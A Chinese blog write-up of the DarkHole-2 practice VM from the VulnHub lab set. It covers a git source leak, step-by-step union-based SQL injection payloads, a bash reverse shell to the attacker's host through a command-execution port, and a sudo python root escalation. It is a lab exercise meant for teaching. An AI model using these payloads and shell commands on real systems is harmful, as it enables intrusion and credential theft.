Neos的渗透测试靶机练习——DarkHole-2

最新推荐文章于 2024-05-11 20:58:20 发布
最新推荐文章于 2024-05-11 20:58:20 发布
阅读量1k 收藏 21
点赞数 16
分类专栏: 靶场练习 文章标签: 渗透测试 网络安全 sql git 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38678845/article/details/135757467
版权

DarkHole-2

一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DarkHole-2(网卡初始为仅主机模式,要有安全意识)

靶机网卡有问题需要提前修改,进入系统前先按shift,
然后按e进入编辑模式,
将ro 至 initrd之前 的内容修改为 rw single init=/bin/bash,
然后按ctrl + x,重新设置password(输入passwd 然后输入想设置的密码),
输入vim /etc/netplan/00-installer-config.yaml,
将其中的ens33修改为enp0s17,
保存后关靶机,
至此 重启靶机 在攻击机中可搜到ip。

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切换为root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101
输入arp-scan -l扫描本网段存活主机,即靶机ip地址
靶机ip
可以看到靶机ip192.168.56.105,。
输入nmap -sV -p- 192.168.56.105扫描靶机所有端口开放情况
靶机端口
可以看到端口22、80是开放的。
浏览器输入192.168.56.105:80。
dh-2

命令行输入whatweb 192.168.56.105查询网站指纹信息
网站指纹
没什么关键信息。
输入dirsearch -u http://192.168.56.105,扫描网站目录。
扫描结果
扫描出来个/.git/目录,这个目录是本次渗透测的关键点,因为可以通过两个工具githack、git-dumper得到网页源代码。
我们这里使用git-dumper
先下载安装pip install git-dumper,然后输入git-dumper http://192.168.56.105/.git/ neosHack将源代码导入本地neosHack目录中。
在这里插入图片描述

2. git文件泄露

我们进入该目录,输入git log查看日志。
在这里插入图片描述
发现有三次提交记录,我们使用git diff命令挨个查看三次提交在哪里修改过代码。
在这里插入图片描述
发现第二条有修改代码的记录,并在其中发现了一个邮箱用户lush@admin.com密码321
我们使用这个账号重新登陆页面。
在这里插入图片描述
点击提交按钮没有用,但是URL有一个参数id。我刚经历过sqli-labs的洗礼,本能的认为这里有SQL注入,我们不用sqlmap了,手动测一下。
我做了一个SQL注入专项靶场训练,感兴趣的可以看我这一篇文章:Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南,里面基本上涉及到SQL注入所有技巧了。

3. SQL注入

1)测试是数字型注入还是字符型注入:
构造参数:?id=1 and 1=1?id=1 and 1=2,发现二者页面显示内容相同,说明不是数字型注入;
2)判断闭合点
添加单引号:?id=1',页面空白,重新添加双引号:?id=1",页面正常显示,说明是字符型单引号闭合。
3)测试数据表的列数
构造参数:?id=1' order by 6 -- neos,正常显示,当order by 7时页面空白,说明数据表为6列。
4)测试回显位
构造参数:?id=-1' union select 1,2,3,4,5,6 -- neos,发现回显位为2,3,5,6号位。
在这里插入图片描述
5)联合注入:
有这么多的回显位,我们可以一次性测出很多东西。
1>测数据库名
我们构造参数:?id=-1' union select 1,database(),version(),4,@@basedir,@@datadir -- neos在这里插入图片描述
我们在对应的回显位分别测出了数据库名版本数据库的安装路径数据库文件的存放路径
2>测数据表名
我们继续构造参数:?id=-1' union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database() -- neos
在这里插入图片描述
测出了数据库darkhole_2有两个数据表sshusers
3>测属性名
我们分别测ssh表和users表有哪些属性名。
ssh表:?id=-1' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='ssh' -- neos,发现该表有三个属性名id、pass、user
在这里插入图片描述
users表:?id=-1' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='users' -- neos,发现有很多个属性名,但我们只需要知道id,password,username这三个属性即可。这里没显示全,这种情况下我们可以借助limit关键字来将剩余的属性名测出来,比如构造参数:?id=-1' union select 1,2,column_name,4,5,6 from information_schema.columns where table_name='users' limit 6,1-- neos得知那个没显示全的属性名为CURRENT_CONNECTIONS
在这里插入图片描述
4>测数据项
测ssh表的所有内容:?id=-1' union select 1,2,group_concat(id),4,group_concat(username),group_concat(password) from ssh-- neos,发现只有一个用户jehad,密码为fool
在这里插入图片描述
测users表的所有内容:?id=-1' union select 1,2,group_concat(id),4,group_concat(username),group_concat(password) from users -- neos,发现依然只有一个用户。
在这里插入图片描述
6)登陆账号
我们使用ssh表中的那个jehad用户ssh登陆。
在这里插入图片描述

4. 提权

sudo -lfind / -perm -u=s -type f 2>/dev/null没发现什么可以提权的地方。
我们继续输入cat .bash_history查看历史文件,发现9999端口是有服务的。
在这里插入图片描述
我们输入ss -antp,查看socket信息,发下9999端口确实有活动信息。
在这里插入图片描述
输入cat /etc/crontab,查看定时任务信息,发现另一个用户losy
在这里插入图片描述
输入curl "http://127.0.0.1:9999/?cmd=whoami",发现9999端口可以以losy的权限执行命令:
在这里插入图片描述
那么losy就是我们的目标了。9999端口没办法访问,我们重新ssh连接,将本地端口 9999端口与靶机端口映射,访问本机9999端口转发到靶机9999端口:ssh jehad@192.168.56.105 -L 9999:localhost:9999
在这里插入图片描述
本地监听nc -lvvp 4444
在这里插入图片描述
然后构造命令bash -c 'bash -i >& /dev/tcp/192.168.56.101/4444 0>&1',对其进行URL编码。
在这里插入图片描述
靶机输入curl http://127.0.0.1:9999/?cmd=bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.56.101%2f4444+0%3e%261%27,成功反弹losy的shell。
在这里插入图片描述
我们查看/home/losy目录下的.bash_history文件发现下面有losy的密码。
在这里插入图片描述
我们ssh登陆losy用户,
在这里插入图片描述
发现可以以root执行python,
在这里插入图片描述
我们直接输入sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")',成功提权到root,并在/root目录下发现flag!!!
在这里插入图片描述
至此,渗透结束。

三、总结

本次渗透测试总体来讲比较简单的,都是以往渗透遇到的经典操作,注意一下git文件泄露,及SQL注入漏洞的原理即可。

Dr.Neos
关注
  • 16
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
neos-simple-editor-extend:通过YAML-Configuration扩展Neos CKEditor的简单方法
05-14
composer require breadlesscode/neos-simple-editor-extend --no-update --no-update命令可防止自动更新依赖关系。 将软件包添加到主题composer.json后,请返回Neos安装的根目录并运行composer更新。 现
neos-normalize:@neos21neos-normalize
05-31
Neo 的标准化:@ neos21 / neos-normalize 基于Normalize.css的思想,制定与Windows、Mac、iOS最新浏览器的最小必要规范化样式。我们不会完全统一所有元素的样式,而是仅对经常使用的元素进行最小样式化。 演示 ...
DarkHole_2靶场
zjxxxy的博客
06-14 180
vulnhub靶场DarkHole_2攻略
DarkHole_2
追求卓越,技术流~
01-14 1498
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
2024年网络安全最全VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新2024最新网络安全面试真题解析
最新发布
2401_84297944的博客
05-11 570
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
VulnHub——DarkHole_2
weixin_52512479的博客
08-03 164
IP:192.168.197.136,开启端口:22、80查看80端口存在登录界面,这里需要输入邮箱,密码。。。
DARKHOLE 2
Czheisenberg的博客
02-18 610
vulnhub靶场——DarkHole 2 WriteUp
DARKHOLE: 2
weixin_45042115的博客
10-05 1882
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
darkhole2
qq_62144749的博客
09-02 428
vulnhub darkhole2
neos-development-collection:包含Neos核心软件包的统一存储库,用于Neos开发
05-12
贡献如果您想为Neos做出贡献并想建立一个开发环境,请按照以下步骤操作: composer create-project neos/neos-development-distribution neos-development dev-master --keep-vcs 请注意,您从中创建项目的-...
CM.Neos.ThemeModule:自定义支持的Neos主题
05-16
在您的站点包中运行composer require --no-update cm/neos-thememodule 在您的项目中运行composer update 。 如果没有安装该软件包,则因为您的站点软件包不是通过composer管理的,因此您需要在项目根目录中再次
neos-ui-extensibility-examples:Neos UI可扩展性示例
05-14
git clone git@github.com:neos/neos-ui-extensibility-examples.git Neos.Neos.Ui.ExtensibilityExamples cd ../../ ./flow flow:package:rescan 如何建立范例 目前,这些示例仅适用于纱线,不适用于NPM安装。 转...
靶机-DarkHole_2
weixin_58602402的博客
06-14 164
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。方法一:wget -r http://192.168.12.168/.git/10.先ssh进行登录losy/gang,根据获取的命令利用python调sh。3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露。1.主机发现,发现靶机ip:192.168.12.168。4.到查找到的目录下查看,发现webshell文件。爆内容,发现用户和密码:jehad/fool。1.用获得的用户和密码进行ssh登录。
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1275
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
vulnhub之darkhole_2
weixin_54431413的博客
07-04 483
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 998
vulnhub靶场 DarkHole: 2,难度:困难级别
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2037
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3579
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHub靶机渗透实战8-darkhole-2
随心所欲不逾矩
11-22 1348
在历史命令记录中: wget 下载了一个 反弹shell,那我们也要来反弹shell,传shell到靶机上。看到第2次更新时,login.php使用了默认凭证。看到 and id =1,做了防sql注入,那是不是代表登入进去之后就存在sql注入了。因此,我们将 HEAD 切换到该提交,并查看login.php,在这里我们就已经发现账号密码了。history查看一下,losy用户的密码是:gang.网络模式的话,我喜欢用桥接,直接桥接。邮箱账户:lush@admin.com,密码:321.
问题1 提出一个涉及20个节点的对称旅行推销员问题的陈述,定义一个距离矩阵。 写出所提问题的线性规划模型,解释变量、目标函数和约束条件的含义(你可以依靠AMPL模型)。 使用NEOS服务器,用Concorde解决这个问题。 用AMPL来解决这个问题。 进行计算研究,包括比较R算法 "two opt"、"nearest insertion"、"cheapest insertion "和 "repetitive nn "各运行10次,并提供每个目标值的最佳结果、最差结果、平均值和标准偏差。 考虑将你的问题限制在只有4个节点,并使用启发式反转算法解决它。
06-06
答案1:这是一个传统的对称性旅行推销员问题,其中有20个城市需要被访问,每个城市之间的距离是已知的。我们需要找到一条最短的路径,使旅行推销员能够访问每个城市一次并返回出发城市。我们可以使用一个20x20的距离矩阵来表示城市之间的距离。 线性规划模型如下: ``` minimize sum{i in 1..n, j in 1..n, i!=j} c[i,j] * x[i,j] subject to sum{j in 1..n, j!=i} x[i,j] = 1 for i in 1..n sum{i in 1..n, i!=j} x[i,j] = 1 for j in 1..n u[i] - u[j] + nx <= (n-1) * (1-x[i,j]) for i in 2..n, j in 2..n, i!=j 0 <= x[i,j] <= 1 for i in 1..n, j in 1..n, i!=j 2 <= u[i] <= n for i in 2..n u[1] = 1 ``` 其中,变量x[i,j]表示从城市i到城市j是否存在路径,c[i,j]表示从城市i到城市j的距离,u[i]表示第i个城市的顺序。目标函数是使得路径长度最短,约束条件分别是每个城市只能被访问一次,路径必须连通,以及顺序必须满足要求。 我们使用NEOS服务器上的Concorde来解决这个问题,得到最优解为26442.0。 然后,我们使用AMPL来解决这个问题,并比较四种启发式算法的表现。这四种算法分别是"two opt"、"nearest insertion"、"cheapest insertion"和"repetitive nn"。每个算法都运行10次,得到的结果如下: | Algorithm | Best | Worst | Average | Std Dev | | :-------: | :--: | :---: | :-----: | :-----: | | two opt | 28350 | 29869 | 29009.7 | 607.54 | | nearest insertion | 28265 | 29976 | 28858.5 | 604.81 | | cheapest insertion | 27692 | 29681 | 28466.3 | 622.18 | | repetitive nn | 28729 | 30163 | 29427.0 | 574.76 | 我们可以看到,最佳的结果是使用"cheapest insertion"算法得到的,其次是"repetitive nn"算法。"two opt"和"nearest insertion"算法的性能稍差。 最后,我们将问题限制为只有4个节点,并使用启发式反转算法来解决。我们得到的最优路径长度为10,最优路径为1-4-2-3-1。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值